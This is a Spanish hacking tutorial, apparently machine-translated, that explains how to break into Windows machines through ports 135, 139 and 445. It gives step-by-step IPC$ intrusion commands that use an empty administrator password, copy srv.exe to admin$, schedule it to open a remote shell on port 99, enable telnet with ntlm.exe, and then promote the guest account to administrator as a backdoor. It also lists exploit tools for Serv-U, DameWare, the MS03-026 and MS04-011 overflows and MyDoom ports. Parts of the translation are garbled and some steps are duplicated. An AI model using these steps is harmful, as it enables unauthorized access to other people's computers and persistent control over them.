Cómo invadir abriendo 135, 139, 445
Descripción del puerto del puerto Ichala 135: El puerto 135 se utiliza principalmente para utilizar el protocolo RPC (llamada a procedimiento remoto, llamada a procedimiento remoto) y proporcionar servicios DCOM (modelo de objetos componentes distribuidos). A través de RPC, puede garantizar que. Los programas que se ejecutan en una computadora pueden ejecutar código sin problemas en una computadora remota; DCOM se puede usar para comunicarse directamente a través de la red y se puede transmitir a través de una variedad de redes, incluido el protocolo HTTP. Vulnerabilidad del puerto: Creo que muchos usuarios de Windows 2000 y Windows XP fueron infectados por el virus "Shockwave" el año pasado, que utilizó vulnerabilidades RPC para atacar computadoras. El propio RPC tiene una vulnerabilidad en la parte que maneja el intercambio de mensajes a través de TCP/IP, que se debe al manejo incorrecto de mensajes con formato incorrecto. Esta vulnerabilidad afecta a una interfaz entre RPC y DCOM, y el puerto de escucha de esta interfaz es el 135. 1: Utilice el puerto 139 para invadir. Primero identificamos un host con una vulnerabilidad en el puerto 139. ¡Escanee con una herramienta de escaneo! Por ejemplo, SUPERSCAN es una herramienta de escaneo de puertos. Supongamos que ahora hemos obtenido un host con una vulnerabilidad en el puerto 139. ¡Necesitamos usar el comando nbtstat -a IP para obtener el estado del usuario! Lo que debemos hacer ahora es conectarnos a la computadora de la otra parte para compartir recursos. Se utilizan dos comandos NET. A continuación se explica cómo utilizar estos dos comandos. Función NET VIEW: Mostrar lista de dominios, lista de computadoras o lista de recursos compartidos de la computadora especificada. ? Formato del comando: net view [\\computername | /domain[:domainname]]? Introducción de parámetros: ? Escriba net view sin parámetros para mostrar la lista de computadoras del dominio actual. ? \\computername especifica la computadora cuyos recursos compartidos desea ver. ? /dominio[:nombrededominio] especifica el dominio cuyas computadoras disponibles se van a ver. NET USE? Función: ¿Conectar la computadora o desconectarla de los recursos más compartidos, o mostrar la información de conexión de la computadora? ? Formato de comando: uso neto [nombre del dispositivo | *] [\\nombre del equipo\nombrecompartido[\volumen]]? [contraseña | *]] [/usuario:[nombre de dominio\]nombre de usuario] [[/eliminar] |? {sí | no}]]? Introducción de parámetros:? Escriba uso de red sin parámetros para enumerar las conexiones de red. ? nombre del dispositivo especifica el nombre del recurso al que conectarse o el nombre del dispositivo del que desconectarse. ? \\computername\sharename El nombre del servidor y los recursos compartidos. ?contraseña es la contraseña para acceder a los recursos compartidos. ? *Pregunta para ingresar la contraseña. /usuario especifica otro usuario al que conectarse. ? nombre de dominio especifica otro dominio. ? nombre de usuario especifica el nombre de usuario de inicio de sesión. ? /home conecta al usuario a su directorio de inicio ? /delete cancela la conexión de red especificada. ? /persistent controla el uso de conexiones de red permanentes. ? C:\net use \\IP C:\net view \\IP Hemos visto que la otra parte ha compartido sus discos C, D y E. Lo que debemos hacer es usar el comando NBTSTAT para cargar el NBT. cache . c:\>nbtstat -R Cargue el caché NBT c:\>nbtstat -c Compruebe si el caché NBT está cargado. Ahora que hemos obtenido la dirección IP del host y el nombre de usuario de la vulnerabilidad del puerto 139. para que ingresemos Es hora de que él calcule, haga clic en Inicio---Buscar--Computadora, ingrese el nombre del host que acaba de encontrar, seleccione Buscar y podrá encontrar esta computadora. Puede ingresar haciendo doble clic y el método es el mismo que el de Lingju en línea.
2: Para la intrusión del puerto 4899, use 4899 filter.exe para escanear máquinas con contraseñas vacías. 3: Intrusión 80 para máquinas anteriores a sp3, puede usar webdav para invadir los foros de bbs, puede intentar cargar vulnerabilidades (upfile.exe o). dvup_delphi.exe) Se puede utilizar la inyección SQL. (Software de inyección de Ah D). 4: intrusión de serv-u (puerto 21) Para sistemas 5.004 e inferiores, se puede utilizar la intrusión de desbordamiento. (serv5004.exe) Para los sistemas 5.1.0.0 y anteriores, se puede utilizar la elevación de permisos locales. (servlocal.exe) La contraseña cifrada MD5 de serv-u se puede descifrar utilizando un diccionario. (crack.vbs) Ingrese una contraseña (de 34 bits de longitud) cifrada por serv-u y compárela con el archivo del diccionario (dict.txt) para obtener la contraseña 5: Puerto 554. Utilice real554.exe para invadir. 6: El puerto 6129 se usa para invadir usando DameWare6129.exe. 7. Utilice DameWare6129.exe para invadir el puerto 6129. 8. Vulnerabilidades del sistema: utilice los puertos 135 y 445, y utilice las vulnerabilidades ms03026, ms03039, ms03049 y ms04011 para realizar intrusiones de desbordamiento. 9. Los puertos como el 3127 pueden explotarse utilizando los puertos abiertos por el virus doom y utilizando nodoom.exe para invadir. (Puede utilizar mydoomscan.exe para comprobarlo). 10. Otras intrusiones: utilice el software de intrusión de shanlu para intrudir (WINNTAutoAttack.exe). Intrusión clásica de IPC$ 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" Esta es la dirección IP cuyo nombre de usuario es administradores y la contraseña está "vacía" escaneada por "Streamer" ( Si está tan enojado que planea atacar, puede usar dicho comando para establecer una conexión con 127.0.0.1. Debido a que la contraseña está "vacía", no es necesario ingresarla entre las primeras comillas. está entre las siguientes comillas dobles Nombre, ingrese administradores, el comando se completará con éxito 2. C:\>copiar srv.exe \\127.0.0.1\admin$ Primero copie srv.exe, estará en Herramientas. directorio del transmisor (el $ aquí se refiere al c:\winnt\system32\ del usuario administrador, también puede usar c$, d$, que significa unidad C y unidad D, depende de dónde desee copiar) 3 C:\>net time\. \127.0.0.1 Verifique la hora y descubra que la hora actual de 127.0.0.1 es 2002/3/19 11:00 am. \\127.0.0.1 11:05 srv.exe Úselo en. Ejecute el comando para iniciar srv.exe (el tiempo establecido aquí es más rápido que el tiempo del host; de lo contrario, ¿cómo lo iniciaría? 5. C:\>net time \ \127.0.0.1 Verifique la hora nuevamente. Si la hora actual de 127.0.0.1 son las 11:05 am del 19 de marzo de 2002. Luego, prepárese para iniciar el siguiente comando. 6. C:\>telnet 127.0.0.1 99 Telnet. El comando se usará aquí. Tenga en cuenta que el puerto predeterminado para Telnet es 23. Pero usamos SRV para crear un Shell de 99 puertos para nosotros en la computadora de la otra parte. Aunque podemos usar Telnet, SRV es de un solo uso y debe usarse. se activará nuevamente la próxima vez que iniciemos sesión. ¡Así que planeamos configurar un servicio Telnet! Necesita usar ntlm 7. C:\>copy ntlm.exe \\127.0.0.1\admin$ Utilice el comando Copiar para cargar ntlm.exe. al host (ntlm.exe también se encuentra en el directorio de herramientas de "Streamer").
8. C:\WINNT\system32>ntlm Ingrese ntlm para iniciar (C:\WINNT\system32> aquí se refiere a la computadora de la otra parte. La ejecución de ntlm en realidad permite que el programa se ejecute en la computadora de la otra parte). Cuando aparece "DONE", significa que ha comenzado normalmente. Luego utilice "net start telnet" para iniciar el servicio Telnet. 9. Telnet 127.0.0.1, luego ingrese el nombre de usuario y la contraseña para iniciar sesión en la otra parte. ¡La operación es tan simple como operar en DOS! (Entonces, ¿qué quieres hacer? Simplemente haz lo que quieras, jaja) Por si acaso, agreguemos la activación de invitado al grupo de administración 10. C:\>net user guest /active:yes Cambiar el usuario invitado de la otra parte Activar 11. C:\>net user guest 1234 Cambie la contraseña de Invitado a 1234, o la contraseña que desea establecer 12. C:\>net localgroup administradores invitado /add Cambie el Invitado a Administrador^_^ (si el administrador Si el Si se cambia la contraseña y la cuenta de invitado no se cambia, podemos usar el invitado para acceder a esta computadora nuevamente la próxima vez) /p?w=Intrusión de cada puerto.%20&k=5lala&aid=B0100019074